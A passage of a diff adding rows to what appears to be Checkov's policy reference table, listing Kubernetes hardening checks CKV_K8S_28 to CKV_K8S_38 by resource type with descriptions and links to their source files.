+| 2977 | CKV_K8S_28               | resource                         | kubernetes_pod                                                                                   | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Terraform               | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py)                                                                                        |
+| 2978 | CKV_K8S_28               | resource                         | kubernetes_pod_v1                                                                                | Minimize the admission of containers with the NET_RAW capability                                                                                                                                         | Terraform               | [DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py)                                                                                        |
+| 2979 | CKV_K8S_29               | resource                         | CronJob                                                                                          | Apply security context to your pods and containers                                                                                                                                                       | Kubernetes              | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py)                                                                                          |
+| 2980 | CKV_K8S_29               | resource                         | DaemonSet                                                                                        | Apply security context to your pods and containers                                                                                                                                                       | Kubernetes              | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py)                                                                                          |
+| 2981 | CKV_K8S_29               | resource                         | Deployment                                                                                       | Apply security context to your pods and containers                                                                                                                                                       | Kubernetes              | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py)                                                                                          |
+| 2982 | CKV_K8S_29               | resource                         | Job                                                                                              | Apply security context to your pods and containers                                                                                                                                                       | Kubernetes              | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py)                                                                                          |
+| 2983 | CKV_K8S_29               | resource                         | Pod                                                                                              | Apply security context to your pods and containers                                                                                                                                                       | Kubernetes              | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py)                                                                                          |
+| 2984 | CKV_K8S_29               | resource                         | ReplicaSet                                                                                       | Apply security context to your pods and containers                                                                                                                                                       | Kubernetes              | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py)                                                                                          |
+| 2985 | CKV_K8S_29               | resource                         | ReplicationController                                                                            | Apply security context to your pods and containers                                                                                                                                                       | Kubernetes              | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py)                                                                                          |
+| 2986 | CKV_K8S_29               | resource                         | StatefulSet                                                                                      | Apply security context to your pods and containers                                                                                                                                                       | Kubernetes              | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PodSecurityContext.py)                                                                                          |
+| 2987 | CKV_K8S_29               | resource                         | kubernetes_daemon_set_v1                                                                         | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform               | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                                    |
+| 2988 | CKV_K8S_29               | resource                         | kubernetes_daemonset                                                                             | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform               | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                                    |
+| 2989 | CKV_K8S_29               | resource                         | kubernetes_deployment                                                                            | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform               | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                                    |
+| 2990 | CKV_K8S_29               | resource                         | kubernetes_deployment_v1                                                                         | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform               | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                                    |
+| 2991 | CKV_K8S_29               | resource                         | kubernetes_pod                                                                                   | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform               | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                                    |
+| 2992 | CKV_K8S_29               | resource                         | kubernetes_pod_v1                                                                                | Apply security context to your pods, deployments and daemon_sets                                                                                                                                         | Terraform               | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py)                                                                                    |
+| 2993 | CKV_K8S_30               | resource                         | CronJob                                                                                          | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                              |
+| 2994 | CKV_K8S_30               | resource                         | DaemonSet                                                                                        | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                              |
+| 2995 | CKV_K8S_30               | resource                         | Deployment                                                                                       | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                              |
+| 2996 | CKV_K8S_30               | resource                         | DeploymentConfig                                                                                 | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                              |
+| 2997 | CKV_K8S_30               | resource                         | Job                                                                                              | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                              |
+| 2998 | CKV_K8S_30               | resource                         | Pod                                                                                              | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                              |
+| 2999 | CKV_K8S_30               | resource                         | PodTemplate                                                                                      | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                              |
+| 3000 | CKV_K8S_30               | resource                         | ReplicaSet                                                                                       | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                              |
+| 3001 | CKV_K8S_30               | resource                         | ReplicationController                                                                            | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                              |
+| 3002 | CKV_K8S_30               | resource                         | StatefulSet                                                                                      | Apply security context to your containers                                                                                                                                                                | Kubernetes              | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ContainerSecurityContext.py)                                                                              |
+| 3003 | CKV_K8S_30               | resource                         | kubernetes_deployment                                                                            | Apply security context to your pods and containers                                                                                                                                                       | Terraform               | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py)                                                                        |
+| 3004 | CKV_K8S_30               | resource                         | kubernetes_deployment_v1                                                                         | Apply security context to your pods and containers                                                                                                                                                       | Terraform               | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py)                                                                        |
+| 3005 | CKV_K8S_30               | resource                         | kubernetes_pod                                                                                   | Apply security context to your pods and containers                                                                                                                                                       | Terraform               | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py)                                                                        |
+| 3006 | CKV_K8S_30               | resource                         | kubernetes_pod_v1                                                                                | Apply security context to your pods and containers                                                                                                                                                       | Terraform               | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py)                                                                        |
+| 3007 | CKV_K8S_31               | resource                         | CronJob                                                                                          | Ensure that the seccomp profile is set to docker/default or runtime/default                                                                                                                              | Kubernetes              | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py)                                                                                                                |
+| 3008 | CKV_K8S_31               | resource                         | DaemonSet                                                                                        | Ensure that the seccomp profile is set to docker/default or runtime/default                                                                                                                              | Kubernetes              | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py)                                                                                                                |
+| 3009 | CKV_K8S_31               | resource                         | Deployment                                                                                       | Ensure that the seccomp profile is set to docker/default or runtime/default                                                                                                                              | Kubernetes              | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py)                                                                                                                |
+| 3010 | CKV_K8S_31               | resource                         | Job                                                                                              | Ensure that the seccomp profile is set to docker/default or runtime/default                                                                                                                              | Kubernetes              | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py)                                                                                                                |
+| 3011 | CKV_K8S_31               | resource                         | Pod                                                                                              | Ensure that the seccomp profile is set to docker/default or runtime/default                                                                                                                              | Kubernetes              | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py)                                                                                                                |
+| 3012 | CKV_K8S_31               | resource                         | ReplicaSet                                                                                       | Ensure that the seccomp profile is set to docker/default or runtime/default                                                                                                                              | Kubernetes              | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py)                                                                                                                |
+| 3013 | CKV_K8S_31               | resource                         | ReplicationController                                                                            | Ensure that the seccomp profile is set to docker/default or runtime/default                                                                                                                              | Kubernetes              | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py)                                                                                                                |
+| 3014 | CKV_K8S_31               | resource                         | StatefulSet                                                                                      | Ensure that the seccomp profile is set to docker/default or runtime/default                                                                                                                              | Kubernetes              | [Seccomp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Seccomp.py)                                                                                                                |
+| 3015 | CKV_K8S_32               | resource                         | PodSecurityPolicy                                                                                | Ensure default seccomp profile set to docker/default or runtime/default                                                                                                                                  | Kubernetes              | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SeccompPSP.py)                                                                                                          |
+| 3016 | CKV_K8S_32               | resource                         | kubernetes_pod_security_policy                                                                   | Ensure default seccomp profile set to docker/default or runtime/default                                                                                                                                  | Terraform               | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SeccompPSP.py)                                                                                                    |
+| 3017 | CKV_K8S_33               | resource                         | CronJob                                                                                          | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                        |
+| 3018 | CKV_K8S_33               | resource                         | DaemonSet                                                                                        | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                        |
+| 3019 | CKV_K8S_33               | resource                         | Deployment                                                                                       | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                        |
+| 3020 | CKV_K8S_33               | resource                         | DeploymentConfig                                                                                 | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                        |
+| 3021 | CKV_K8S_33               | resource                         | Job                                                                                              | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                        |
+| 3022 | CKV_K8S_33               | resource                         | Pod                                                                                              | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                        |
+| 3023 | CKV_K8S_33               | resource                         | PodTemplate                                                                                      | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                        |
+| 3024 | CKV_K8S_33               | resource                         | ReplicaSet                                                                                       | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                        |
+| 3025 | CKV_K8S_33               | resource                         | ReplicationController                                                                            | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                        |
+| 3026 | CKV_K8S_33               | resource                         | StatefulSet                                                                                      | Ensure the Kubernetes dashboard is not deployed                                                                                                                                                          | Kubernetes              | [KubernetesDashboard.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubernetesDashboard.py)                                                                                        |
+| 3027 | CKV_K8S_34               | resource                         | CronJob                                                                                          | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                                  |
+| 3028 | CKV_K8S_34               | resource                         | DaemonSet                                                                                        | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                                  |
+| 3029 | CKV_K8S_34               | resource                         | Deployment                                                                                       | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                                  |
+| 3030 | CKV_K8S_34               | resource                         | DeploymentConfig                                                                                 | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                                  |
+| 3031 | CKV_K8S_34               | resource                         | Job                                                                                              | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                                  |
+| 3032 | CKV_K8S_34               | resource                         | Pod                                                                                              | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                                  |
+| 3033 | CKV_K8S_34               | resource                         | PodTemplate                                                                                      | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                                  |
+| 3034 | CKV_K8S_34               | resource                         | ReplicaSet                                                                                       | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                                  |
+| 3035 | CKV_K8S_34               | resource                         | ReplicationController                                                                            | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                                  |
+| 3036 | CKV_K8S_34               | resource                         | StatefulSet                                                                                      | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Kubernetes              | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Tiller.py)                                                                                                                  |
+| 3037 | CKV_K8S_34               | resource                         | kubernetes_deployment                                                                            | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Terraform               | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py)                                                                                                            |
+| 3038 | CKV_K8S_34               | resource                         | kubernetes_deployment_v1                                                                         | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Terraform               | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py)                                                                                                            |
+| 3039 | CKV_K8S_34               | resource                         | kubernetes_pod                                                                                   | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Terraform               | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py)                                                                                                            |
+| 3040 | CKV_K8S_34               | resource                         | kubernetes_pod_v1                                                                                | Ensure that Tiller (Helm v2) is not deployed                                                                                                                                                             | Terraform               | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py)                                                                                                            |
+| 3041 | CKV_K8S_35               | resource                         | CronJob                                                                                          | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                                |
+| 3042 | CKV_K8S_35               | resource                         | DaemonSet                                                                                        | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                                |
+| 3043 | CKV_K8S_35               | resource                         | Deployment                                                                                       | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                                |
+| 3044 | CKV_K8S_35               | resource                         | DeploymentConfig                                                                                 | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                                |
+| 3045 | CKV_K8S_35               | resource                         | Job                                                                                              | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                                |
+| 3046 | CKV_K8S_35               | resource                         | Pod                                                                                              | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                                |
+| 3047 | CKV_K8S_35               | resource                         | PodTemplate                                                                                      | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                                |
+| 3048 | CKV_K8S_35               | resource                         | ReplicaSet                                                                                       | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                                |
+| 3049 | CKV_K8S_35               | resource                         | ReplicationController                                                                            | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                                |
+| 3050 | CKV_K8S_35               | resource                         | StatefulSet                                                                                      | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Kubernetes              | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/Secrets.py)                                                                                                                |
+| 3051 | CKV_K8S_35               | resource                         | kubernetes_deployment                                                                            | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Terraform               | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py)                                                                                                          |
+| 3052 | CKV_K8S_35               | resource                         | kubernetes_deployment_v1                                                                         | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Terraform               | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py)                                                                                                          |
+| 3053 | CKV_K8S_35               | resource                         | kubernetes_pod                                                                                   | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Terraform               | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py)                                                                                                          |
+| 3054 | CKV_K8S_35               | resource                         | kubernetes_pod_v1                                                                                | Prefer using secrets as files over secrets as environment variables                                                                                                                                      | Terraform               | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py)                                                                                                          |
+| 3055 | CKV_K8S_36               | resource                         | PodSecurityPolicy                                                                                | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilitiesPSP.py)                                                                                |
+| 3056 | CKV_K8S_36               | resource                         | kubernetes_pod_security_policy                                                                   | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform               | [MinimiseCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py)                                                                          |
+| 3057 | CKV_K8S_37               | resource                         | CronJob                                                                                          | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                                      |
+| 3058 | CKV_K8S_37               | resource                         | DaemonSet                                                                                        | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                                      |
+| 3059 | CKV_K8S_37               | resource                         | Deployment                                                                                       | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                                      |
+| 3060 | CKV_K8S_37               | resource                         | DeploymentConfig                                                                                 | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                                      |
+| 3061 | CKV_K8S_37               | resource                         | Job                                                                                              | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                                      |
+| 3062 | CKV_K8S_37               | resource                         | Pod                                                                                              | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                                      |
+| 3063 | CKV_K8S_37               | resource                         | PodTemplate                                                                                      | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                                      |
+| 3064 | CKV_K8S_37               | resource                         | ReplicaSet                                                                                       | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                                      |
+| 3065 | CKV_K8S_37               | resource                         | ReplicationController                                                                            | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                                      |
+| 3066 | CKV_K8S_37               | resource                         | StatefulSet                                                                                      | Minimize the admission of containers with capabilities assigned                                                                                                                                          | Kubernetes              | [MinimizeCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/MinimizeCapabilities.py)                                                                                      |
+| 3067 | CKV_K8S_37               | resource                         | kubernetes_deployment                                                                            | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform               | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py)                                                                                |
+| 3068 | CKV_K8S_37               | resource                         | kubernetes_deployment_v1                                                                         | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform               | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py)                                                                                |
+| 3069 | CKV_K8S_37               | resource                         | kubernetes_pod                                                                                   | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform               | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py)                                                                                |
+| 3070 | CKV_K8S_37               | resource                         | kubernetes_pod_v1                                                                                | Minimise the admission of containers with capabilities assigned                                                                                                                                          | Terraform               | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py)                                                                                |
+| 3071 | CKV_K8S_38               | resource                         | CronJob                                                                                          | Ensure that Service Account Tokens are only mounted where necessary                                                                                                                                      | Kubernetes              | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py)                                                                                      |
+| 3072 | CKV_K8S_38               | resource                         | DaemonSet                                                                                        | Ensure that Service Account Tokens are only mounted where necessary                                                                                                                                      | Kubernetes              | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py)                                                                                      |
+| 3073 | CKV_K8S_38               | resource                         | Deployment                                                                                       | Ensure that Service Account Tokens are only mounted where necessary                                                                                                                                      | Kubernetes              | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py)                                                                                      |
+| 3074 | CKV_K8S_38               | resource                         | Job                                                                                              | Ensure that Service Account Tokens are only mounted where necessary                                                                                                                                      | Kubernetes              | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py)                                                                                      |
+| 3075 | CKV_K8S_38               | resource                         | Pod                                                                                              | Ensure that Service Account Tokens are only mounted where necessary                                                                                                                                      | Kubernetes              | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py)                                                                                      |
+| 3076 | CKV_K8S_38               | resource                         | ReplicaSet                                                                                       | Ensure that Service Account Tokens are only mounted where necessary                                                                                                                                      | Kubernetes              | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py)                                                                                      |
+| 3077 | CKV_K8S_38               | resource                         | ReplicationController                                                                            | Ensure that Service Account Tokens are only mounted where necessary                                                                                                                                      | Kubernetes              | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py)                                                                                      |
+| 3078 | CKV_K8S_38               | resource                         | StatefulSet                                                                                      | Ensure that Service Account Tokens are only mounted where necessary                                                                                                                                      | Kubernetes              | [ServiceAccountTokens.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ServiceAccountTokens.py)                                                                                      |
